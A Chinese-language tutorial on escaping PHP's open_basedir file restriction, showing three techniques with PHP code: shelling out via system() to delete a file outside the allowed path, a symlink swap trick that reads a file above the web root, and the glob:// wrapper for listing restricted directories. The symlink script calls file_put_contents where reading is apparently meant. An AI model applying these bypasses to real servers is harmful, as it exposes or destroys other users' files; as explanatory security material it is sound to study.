PHP绕过open_basedir限制操作文件的三种方法

0x00 预备知识

关于open_basedir

open_basedir是php.ini中的一个配置选项
它可将用户访问文件的活动范围限制在指定的区域,
假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的
用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。
注意用open_basedir指定的限制实际上是前缀,而不是目录名。
举例来说: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/user1"都是
可以访问的。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。

关于符号链接

符号链接又叫软链接,是一类特殊的文件,这个文件包含了另一个文件的路径名(绝对路径或者相对路径)。路径可以是任意文件或目录,可以链接不同文件系统的文件。在对符号文件进行读或写操作的时候,系统会自动把该操作转换为对源文件的操作,但删除链接文件时,系统仅仅删除链接文件,而不删除源文件本身。


0x01 命令执行函数

由于open_basedir的设置对system等命令执行函数是无效的,所以我们可以使用命令执行函数来访问限制目录。

我们首先创建一个目录

/home/puret/test/

且在该目录下新建一个1.txt 内容为abc

nano 1.txt

再在该目录下创建一个目录命名为b

mkdir b

并且在该目录下创建一个1.php文件内容为

<?php
     echo file_get_contents("../1.txt");
?>

且在php.ini中设置好我们的open_basedir

open_basedir = /home/puret/test/b/

我们尝试执行1.php看看open_basedir是否会限制我们的访问
执行效果如图



很明显我们无法直接读取open_basedir所规定以外的目录文件。
接下来我们用system函数尝试绕open_basedir的限制来删除1.txt
编辑1.php为

<?php
    system("rm -rf ../1.txt");
?>

先来看看执行1.php之前的文件情况



执行1.php之后



成功通过命令执行函数绕过open_basedir来删除文件。
由于命令执行函数一般都会被限制在disable_function当中,所以我们需要寻找其他的途径来绕过限制。

0x02 symlink()函数

我们先来了解一下symlink函数

bool symlink ( string $target , string $link )

symlink函数将建立一个指向target的名为link的符号链接,当然一般情况下这个target是受限于open_basedir的。
由于早期的symlink不支持windows,我的测试环境就放在Linux下了。
测试的PHP版本是5.3.0,其他的版本大家自测吧。
在Linux环境下我们可以通过symlink完成一些逻辑上的绕过导致可以跨目录操作文件。
我们首先在/var/www/html/1.php中 编辑1.php的内容为

<?php
        mkdir("c");
        chdir("c");
        mkdir("d");
        chdir("d");
        chdir("..");
        chdir("..");
        symlink("c/d","tmplink");
        symlink("tmplink/../../1.txt","exploit");
        unlink("tmplink");
        mkdir("tmplink");
        echo file_put_contents("http://127.0.0.1/exploit");
?>

接着在/var/www/中新建一个1.txt文件内容为

"abc"

再来设置一下我们的open_basedir

open_basedir = /var/www/html/

在html目录下编辑一个php脚本检验一下open_basedir

<?php
          file_get_contents("../1.txt");
?>

执行看下。



意料之中,文件无法访问。
我们执行刚才写好的脚本,1.php



可以看到成功读取到了1.txt的文件内容,逃脱了open_basedir的限制
问题的关键就在于
symlink("tmplink/../../1.txt","exploit");

此时tmplink还是一个符号链接文件,它指向的路径是c/d,因此exploit指向的路径就变成了

c/d/../../1.txt

由于这个路径在open_basedir的范围之内所以exploit成功建立了。
之后我们删除tmplink符号链接文件再新建一个同名为tmplink的文件夹,这时exploit所指向的路径为

tmplink/../../

由于这时候tmplink变成了一个真实存在的文件夹所以tmplink/../../变成了1.txt所在的目录即/var/www/
然后再通过访问符号链接文件exploit即可直接读取到1.txt的文件内容
当然,针对symlink()只需要将它放入disable_function即可解决问题,所以我们需要寻求更多的方法。

0x03 glob伪协议

glob是php自5.3.0版本起开始生效的一个用来筛选目录的伪协议,由于它在筛选目录时是不受open_basedir的制约的,所以我们可以利用它来绕过限制,我们新建一个目录在/var/www/下命名为test
并且在/var/www/html/下新建t.php内容为

<?php
        $a = "glob:///var/www/test/*.txt";
        if ( $b = opendir($a) ) {
                while ( ($file = readdir($b)) !== false ) {
                        echo "filename:".$file."\n";
                }
                closedir($b);
        }
?>

执行结果如图:



成功躲过open_basedir的限制读取到了文件。

推荐阅读更多精彩内容